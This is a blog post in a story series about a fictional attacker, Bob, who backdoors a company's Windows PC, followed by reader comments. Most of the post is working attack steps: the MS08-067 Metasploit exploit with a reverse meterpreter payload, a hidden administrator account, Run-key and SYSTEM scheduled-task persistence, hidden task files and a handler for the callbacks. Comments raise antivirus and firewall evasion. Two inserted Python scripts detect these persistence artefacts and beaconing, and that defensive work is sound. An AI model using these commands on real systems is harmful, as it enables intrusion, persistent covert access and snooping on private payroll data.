Friday, November 20, 2009

Bob The Backdoor Man - Part 2

Previously in Bob Land....

The very next day Bob feels ready to hop back onto his compromised host on the Walliford Fries LAN and get his back doors planted. He logs into the wireless network with the WPA key he cracked earlier and gets a shell on the unpatched PC with the MS08-067 exploit.

use windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp

set LPORT 8181


Bob migrates to a stable process, then uploads his backdoors to the Windows\System32 directory using Meterpreter's upload function.

migrate 714
lcd /root/payloads
upload winmsd32.exe

upload winmsd16.exe

After Bob launches a shell he creates a new user and adds it to the Administrators, Power Users and Backup Operators groups.

net user MS_Support31337 Support31337 /add
net localgroup Administrators MS_Support31337 /add
net localgroup "Backup Operators" MS_Support31337 /add

net localgroup "Power Users" MS_Support31337 /add

He chooses these privileged groups because a group policy may be configured to control the membership of the local Administrators group; by remaining in the other groups he will still have a high level of access if his account is stripped from Administrators.

Now Bob wants to get down to business and plant some of these lovely backdoors he's created. Bob's first port of call is to create a registry entry that runs his meterpreter payload and connects back to Bob each time the computer is booted.

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Microsoft winmsd32" /d "C:\Windows\System32\winmsd32.exe"

Bob checks that his registry entry has been set using the reg query command.

reg query HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Then it occurs to Bob that someone may well stumble across his registry entry and remove it, so he decides to have a backup by creating some scheduled tasks. One task (the meterpreter reverse connect) will run every 10 minutes and the other (the listening shell) will run at startup.

schtasks /create /tn "Winmsd32" /tr C:\Windows\System32\winmsd32.exe /sc minute /mo 10 /RU "NT AUTHORITY\SYSTEM"

schtasks /create /tn "Winmsd16" /tr C:\Windows\System32\winmsd16.exe /sc onstart /RU "NT AUTHORITY\SYSTEM"

Now the only way the normal logged-in user would see these scheduled tasks is by looking at the directory from a command prompt. Only an Administrator running schtasks on the PC would see these scheduled tasks; anyone else will see nothing. Even looking at the C:\Windows\Tasks folder through Explorer wouldn't show the tasks, as it only shows the current user's tasks.

Bob's pretty happy about this, but what would make him happier would be if it was really, really hard to see his backdoors. Then it occurs to him that by changing the attributes on the jobs in the tasks folder it would be really, really hard, as the user would have to run "dir /a:h *.*" on the directory specifically. Okay, so that's not really, really hard, but it is a bit of a bugger!

cd \windows\tasks
Attrib +H winmsd*.job

Then Bob checks his handiwork by looking at just the hidden files.
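Every step from the new account through to the hidden .job files leaves an artefact that a defender can collect with the same built-in commands. As an added illustration (not part of the original post and not SynJunkie's code), the Python script below parses the text output an administrator or responder would gather with reg query, schtasks /query /fo CSV /v, net localgroup and dir /a:h, and reports the things described above: an unexpected Run value, tasks running as SYSTEM every few minutes or at start-up, a new member of Administrators, and any .job file that has been hidden. The sample command output is constructed to mirror Bob's host (the schtasks CSV uses only a subset of the real columns), and the baseline allow-lists are assumptions for a clean build.

```python
"""Offline triage of Windows persistence artefacts from collected command output.

Added example for this post, not the author's code. All sample output below is
constructed; the BASELINE_* sets are assumptions about what a clean host has.
"""
import csv
import io
import re

# Constructed output of: reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
REG_QUERY_RUN = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    VMware Tools    REG_SZ    "C:\Program Files\VMware\VMware Tools\VMwareTray.exe"
    Microsoft winmsd32    REG_SZ    C:\Windows\System32\winmsd32.exe
"""

# Constructed output of: schtasks /query /fo CSV /v (subset of the real columns)
SCHTASKS_CSV = r"""
"HostName","TaskName","Task To Run","Schedule Type","Modifier","Run As User"
"WF-PC01","\Winmsd32","C:\Windows\System32\winmsd32.exe","Minute","10","NT AUTHORITY\SYSTEM"
"WF-PC01","\Winmsd16","C:\Windows\System32\winmsd16.exe","At system start up","N/A","NT AUTHORITY\SYSTEM"
"WF-PC01","\GoogleUpdateTaskMachineUA","C:\Program Files\Google\Update\GoogleUpdate.exe /ua","Daily","1","NT AUTHORITY\SYSTEM"
"""

# Constructed output of: net localgroup Administrators
NET_LOCALGROUP_ADMINS = r"""
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
MS_Support31337
WALLIFORD\Domain Admins
The command completed successfully.
"""

# Constructed output of: dir /a:h C:\Windows\Tasks (only hidden entries are listed)
DIR_HIDDEN_TASKS = r"""
 Directory of C:\Windows\Tasks

20/11/2009  10:41               354 winmsd32.job
20/11/2009  10:42               354 winmsd16.job
               2 File(s)            708 bytes
"""

# Assumed baselines for this host; anything outside them is reported.
BASELINE_RUN_VALUES = {"VMware Tools"}
BASELINE_TASKS = {"GoogleUpdateTaskMachineUA"}
BASELINE_ADMINS = {"Administrator", r"WALLIFORD\Domain Admins"}


def parse_reg_run(text):
    """Return {value name: data} from 'reg query ...\\Run' output."""
    entries = {}
    for line in text.splitlines():
        m = re.match(r"^\s+(.+?)\s+(REG_\w+)\s+(.*)$", line)
        if m:
            entries[m.group(1)] = m.group(3).strip()
    return entries


def parse_schtasks_csv(text):
    """Return one dict per task from 'schtasks /query /fo CSV /v' output."""
    return list(csv.DictReader(io.StringIO(text.strip())))


def parse_net_localgroup(text):
    """Return the member names listed by 'net localgroup <group>'."""
    members, in_members = [], False
    for line in text.splitlines():
        if line.startswith("----"):
            in_members = True
            continue
        if line.startswith("The command completed"):
            break
        if in_members and line.strip():
            members.append(line.strip())
    return members


def parse_dir_jobs(text):
    """Return the .job file names in a 'dir' listing."""
    return [m.group(1) for m in re.finditer(r"(\S+\.job)\s*$", text, re.M | re.I)]


def triage(reg_text, tasks_csv, admins_text, hidden_dir_text):
    """Return (category, detail) findings for artefacts outside the baselines."""
    findings = []
    for name, data in parse_reg_run(reg_text).items():
        if name not in BASELINE_RUN_VALUES:
            findings.append(("run_key", f"{name} -> {data}"))
    for row in parse_schtasks_csv(tasks_csv):
        name = row["TaskName"].lstrip("\\")
        if name in BASELINE_TASKS:
            continue
        sched = row["Schedule Type"].lower()
        # SYSTEM tasks on a minute cadence or at boot are the post's persistence pattern
        if "SYSTEM" in row["Run As User"].upper() and ("minute" in sched or "start" in sched):
            findings.append(("task", f"{name}: {row['Task To Run']} "
                                     f"({row['Schedule Type']} {row['Modifier']}) as {row['Run As User']}"))
    for member in parse_net_localgroup(admins_text):
        if member not in BASELINE_ADMINS:
            findings.append(("admin_member", member))
    for job in parse_dir_jobs(hidden_dir_text):  # every .job here carries the hidden attribute
        findings.append(("hidden_job", job))
    return findings


if __name__ == "__main__":
    for category, detail in triage(REG_QUERY_RUN, SCHTASKS_CSV, NET_LOCALGROUP_ADMINS, DIR_HIDDEN_TASKS):
        print(f"[{category}] {detail}")
```

On a real host the four inputs come from redirecting each command to a file and feeding the files in; the parsers only depend on the shape of the output, not on any registry or task-scheduler API, so the script can run on a collection workstation rather than on the suspect machine.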

Great, Bob fires up another instance of msfconsole and sets up his handler for the sessions that should start coming in.

use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp


set LPORT 8080
set ExitOnSession false

set AutoRunScript winenum.rb

exploit -j -z

Within a minute or two Bob gets a session from his scheduled task backdoor.

What he really likes about these scheduled tasks is that he won't get loads of sessions back from the same host, but if he loses the connection he'll get another session back 10 minutes later. Also, every now and then Bob can change the AutoRunScript so Metasploit can gather all sorts of useful information on his behalf.
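That same 10-minute reconnect is what gives the backdoor away on the network side: a task that fires on a fixed schedule produces outbound connections at an interval far more regular than anything a user generates. As an added example (not from the original post), the Python below scores each outbound flow in a connection log by how evenly spaced its connections are and reports the regular ones. The log format, the addresses (taken from documentation ranges) and the thresholds are all constructed or assumed for the demonstration.

```python
"""Beacon (periodic reconnect) detection over an outbound connection log.

Added example for this post, not the author's code. The log lines, their
format and the thresholds are constructed/assumed.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed log: "<ISO timestamp> <src_ip> -> <dst_ip>:<dst_port> <action>".
# 10.0.1.57 talks to 203.0.113.10:8080 every ten minutes (the scheduled task)
# and to 198.51.100.20:80 at irregular times (ordinary browsing).
SAMPLE_LOG = """\
2009-11-20T10:30:02 10.0.1.57 -> 203.0.113.10:8080 ALLOW
2009-11-20T10:31:40 10.0.1.57 -> 198.51.100.20:80 ALLOW
2009-11-20T10:33:05 10.0.1.57 -> 198.51.100.20:80 ALLOW
2009-11-20T10:40:03 10.0.1.57 -> 203.0.113.10:8080 ALLOW
2009-11-20T10:44:12 10.0.1.57 -> 198.51.100.20:80 ALLOW
2009-11-20T10:50:01 10.0.1.57 -> 203.0.113.10:8080 ALLOW
2009-11-20T10:52:30 10.0.1.23 -> 198.51.100.20:80 ALLOW
2009-11-20T11:00:04 10.0.1.57 -> 203.0.113.10:8080 ALLOW
2009-11-20T11:03:15 10.0.1.57 -> 198.51.100.20:80 ALLOW
2009-11-20T11:10:02 10.0.1.57 -> 203.0.113.10:8080 ALLOW
2009-11-20T11:21:45 10.0.1.57 -> 198.51.100.20:80 ALLOW
"""

MIN_CONNECTIONS = 4   # assumed: fewer samples than this cannot establish a rhythm
MAX_JITTER_CV = 0.2   # assumed: stdev/mean of the gaps at or below this counts as regular


def parse_log(text):
    """Yield (timestamp, src, dst, port) tuples from the constructed format."""
    for line in text.splitlines():
        ts, src, _, dst_port, _ = line.split()
        dst, port = dst_port.rsplit(":", 1)
        yield datetime.fromisoformat(ts), src, dst, int(port)


def interval_stats(timestamps):
    """Return (mean gap in seconds, coefficient of variation of the gaps)."""
    ts = sorted(timestamps)
    gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    m = mean(gaps)
    return m, (pstdev(gaps) / m if m else float("inf"))


def find_beacons(text, min_conns=MIN_CONNECTIONS, max_cv=MAX_JITTER_CV):
    """Return {(src, dst, port): (mean_gap_seconds, cv)} for flows that reconnect on a rhythm."""
    flows = defaultdict(list)
    for ts, src, dst, port in parse_log(text):
        flows[(src, dst, port)].append(ts)
    beacons = {}
    for key, stamps in flows.items():
        if len(stamps) < min_conns:
            continue
        m, cv = interval_stats(stamps)
        if cv <= max_cv:
            beacons[key] = (round(m), round(cv, 3))
    return beacons


if __name__ == "__main__":
    for (src, dst, port), (gap, cv) in find_beacons(SAMPLE_LOG).items():
        print(f"{src} -> {dst}:{port} every ~{gap}s (jitter cv={cv})")
```

The coefficient of variation is what separates the two flows here: the browsing flow's gaps range from under two minutes to nearly twenty, while the task's gaps are all within a few seconds of 600. A real deployment would also want to suppress known-regular software (update checkers, monitoring agents) with an allow-list, since those beacon just as cleanly.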

Now Bob is in, he has his backdoors sorted and he wants to have a look around to see what else might be interesting. Bob knows a guy who works for Wallifords. Now this guy is a bit of a dick and is always boasting about how much he earns. Bob's sure the guy exaggerates; wouldn't it be nice if Bob could access the payroll data and see if this guy is telling the truth?

Oh, look at that, lunch time. Bob goes and gets his dinner and has a think about what other interesting things he might be able to find on the Walliford network.

Coming next.......Bob gets to know his new friends!


Bad_Dua said...

Syn, I want to congratulate you, mate. Your site is very informative. For this scenario, in order for Bob to back-connect to the system, he might think to configure firewalls. Because I am assuming this is a middle-level company, they might have some firewalls. Bob needs to figure out how to configure them as well, am I right?

TAPE said...

This series has been marvellous so far, I'm really enjoying it!

Excellent job explaining the msf parts of the story. Clear yet concise!

Looking forward to see what Bob will come up with next..

SynJunkie said...

Thanks Guys.

Bad_Dua - You're right, Bob will need to pull a few firewall tricks out of the bag. He's been lucky not to hit one on the current host, but you can be sure that I'll be covering both the Windows firewall and Cisco firewalls (or at least routers pretending to be firewalls) soon.

Thanks for the suggestion.


Dave said...

How did Bob enjoy Christmas? Did he manage to sort anything out about obfuscating netcat.exe to avoid those nasty AVs?

Has he thought any more about the Windows firewall and Cisco firewall/router tricks?

SynJunkie said...

So I hear, Bob has got some great posts lined up.

At the moment I'm quite busy on my Cisco Blog ( trying to focus so I can get the CCNA which I really should have done by Christmas 2009. I guess I got distracted by the Bob adventures a little too much.

More Bob stuff to come soon, promise.

Dave said...

Ahh - I wondered what had happened to the series of CCNA posts that you posted here last year.

Good luck with your studies. I hope that you get it under your belt PDQ so Bob can resume his challenges!

SynJunkie said...

Well cheers for the interest Dave. I had a comment or two that some readers were not so much into the whole networking/cisco thing so I thought I would separate the topics and focus this blog on the Bob stuff and create another one for my studies.

More Bob to come soon.


Dave said...

Bob likes Metasploit. Might he be interested in Metasploit DHCP Exhaustion and DNS MITM (

SynJunkie said...

Thanks Dave. Bob does like Metasploit. Bob wishes he had more time for Metasploit fun instead of studying!

I'll be sure to take a look soon.